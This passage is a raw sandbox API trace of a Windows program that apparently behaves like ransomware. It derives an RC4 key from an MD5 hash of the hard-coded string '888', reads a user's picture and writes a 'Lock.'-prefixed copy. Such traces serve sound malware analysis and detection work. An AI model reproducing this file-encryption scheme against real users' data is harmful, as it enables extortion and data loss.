| out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.495] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.495] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.495] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.495] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.496] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.497] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.497] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0210.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.498] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.498] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.498] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.499] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c6e8) returned 1 [0210.499] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.499] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.499] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.499] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.499] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.499] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.499] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.500] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.500] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.500] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.500] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab2c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.500] CryptCreateHash (in: hProv=0xa7c6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.500] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.500] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.500] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab278, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.501] CryptHashData (hHash=0x9e2138, pbData=0x2a71c78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.501] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.501] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.501] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.501] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab3b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.501] CryptDeriveKey (in: hProv=0xa7c6e8, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0210.502] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.502] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.502] CryptDestroyHash (hHash=0x9e2138) returned 1 [0210.503] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/ko-PEUGJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ko-peugj.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.504] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.504] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a741f0 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0210.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0210.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.ko-PEUGJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.ko-peugj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, 